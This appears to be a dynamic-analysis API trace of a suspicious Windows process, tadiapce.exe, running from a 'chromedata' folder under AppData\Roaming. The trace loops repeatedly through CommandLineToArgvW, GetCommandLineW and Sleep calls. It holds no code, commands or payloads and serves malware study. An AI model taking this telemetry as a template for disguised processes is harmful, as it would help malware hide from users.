	[0063.805] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171ec8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.805] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.805] Sleep (dwMilliseconds=0x1) 
	[0063.851] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171f58*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.851] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.851] Sleep (dwMilliseconds=0x1) 
	[0063.898] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171fe8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.898] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.898] Sleep (dwMilliseconds=0x1) 
	[0063.945] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b4d30*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.945] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.945] Sleep (dwMilliseconds=0x1) 
	[0063.995] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b4dc0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.995] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.995] Sleep (dwMilliseconds=0x1) 
	[0064.038] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b4e50*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.039] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.039] Sleep (dwMilliseconds=0x1) 
	[0064.085] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b4ee0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.085] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.085] Sleep (dwMilliseconds=0x1) 
	[0064.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b4f70*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.141] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.141] Sleep (dwMilliseconds=0x1) 
	[0064.204] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5000*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.204] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.204] Sleep (dwMilliseconds=0x1) 
	[0064.265] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5090*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.265] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.265] Sleep (dwMilliseconds=0x1) 
	[0064.304] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5120*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.305] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.305] Sleep (dwMilliseconds=0x1) 
	[0064.351] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b51b0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.353] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.353] Sleep (dwMilliseconds=0x1) 
	[0064.397] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5240*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.397] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.397] Sleep (dwMilliseconds=0x1) 
	[0064.436] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b52d0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.436] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.436] Sleep (dwMilliseconds=0x1) 
	[0064.474] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5360*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.474] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.474] Sleep (dwMilliseconds=0x1) 
	[0064.510] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b53f0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.510] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.510] Sleep (dwMilliseconds=0x1) 
	[0064.548] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5480*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.548] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.548] Sleep (dwMilliseconds=0x1) 
	[0064.586] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5510*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.586] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.586] Sleep (dwMilliseconds=0x1) 
	[0064.623] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b55a0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.623] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.623] Sleep (dwMilliseconds=0x1) 
	[0064.660] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5630*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.660] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.660] Sleep (dwMilliseconds=0x1) 
	[0064.708] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b56c0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.708] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.708] Sleep (dwMilliseconds=0x1) 
	[0064.756] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5750*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.756] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.756] Sleep (dwMilliseconds=0x1) 
	[0064.784] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b57e0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.784] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.784] Sleep (dwMilliseconds=0x1) 
	[0064.819] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5870*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.819] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.819] Sleep (dwMilliseconds=0x1) 
	[0064.873] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5900*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.873] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.873] Sleep (dwMilliseconds=0x1) 
	[0064.882] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5990*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0064.882] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0064.882] Sleep (dwMilliseconds=0x1) 
	[0065.022] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5a20*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.022] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.023] Sleep (dwMilliseconds=0x1) 
	[0065.068] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5ab0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.068] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.068] Sleep (dwMilliseconds=0x1) 
	[0065.100] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5b40*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.100] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.100] Sleep (dwMilliseconds=0x1) 
	[0065.115] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5bd0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.115] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.115] Sleep (dwMilliseconds=0x1) 
	[0065.131] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5c60*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.131] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.131] Sleep (dwMilliseconds=0x1) 
	[0065.146] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5cf0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.146] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.146] Sleep (dwMilliseconds=0x1) 
	[0065.162] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5d80*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.162] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.162] Sleep (dwMilliseconds=0x1) 
	[0065.177] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5e10*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.178] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.178] Sleep (dwMilliseconds=0x1) 
	[0065.200] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5ea0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.201] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.201] Sleep (dwMilliseconds=0x1) 
	[0065.209] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5f30*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.209] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.209] Sleep (dwMilliseconds=0x1) 
	[0065.224] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b5fc0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.224] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.224] Sleep (dwMilliseconds=0x1) 
	[0065.240] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6050*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.240] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.240] Sleep (dwMilliseconds=0x1) 
	[0065.256] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b60e0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.256] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.256] Sleep (dwMilliseconds=0x1) 
	[0065.271] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6170*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.271] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.271] Sleep (dwMilliseconds=0x1) 
	[0065.287] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6200*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.287] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.287] Sleep (dwMilliseconds=0x1) 
	[0065.302] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6290*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.302] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.302] Sleep (dwMilliseconds=0x1) 
	[0065.318] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6320*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.318] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.318] Sleep (dwMilliseconds=0x1) 
	[0065.333] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b63b0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.333] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.333] Sleep (dwMilliseconds=0x1) 
	[0065.349] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6440*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.349] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.349] Sleep (dwMilliseconds=0x1) 
	[0065.365] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b64d0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.365] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.365] Sleep (dwMilliseconds=0x1) 
	[0065.381] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6560*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.381] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.381] Sleep (dwMilliseconds=0x1) 
	[0065.396] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b65f0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.396] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.396] Sleep (dwMilliseconds=0x1) 
	[0065.411] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6680*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.411] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.411] Sleep (dwMilliseconds=0x1) 
	[0065.428] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6710*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.428] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.428] Sleep (dwMilliseconds=0x1) 
	[0065.442] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b67a0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.443] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.443] Sleep (dwMilliseconds=0x1) 
	[0065.458] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6830*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.458] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.458] Sleep (dwMilliseconds=0x1) 
	[0065.474] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b68c0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.474] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.474] Sleep (dwMilliseconds=0x1) 
	[0065.490] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6950*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.490] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.490] Sleep (dwMilliseconds=0x1) 
	[0065.505] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b69e0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.505] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.505] Sleep (dwMilliseconds=0x1) 
	[0065.521] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6a70*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.521] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.521] Sleep (dwMilliseconds=0x1) 
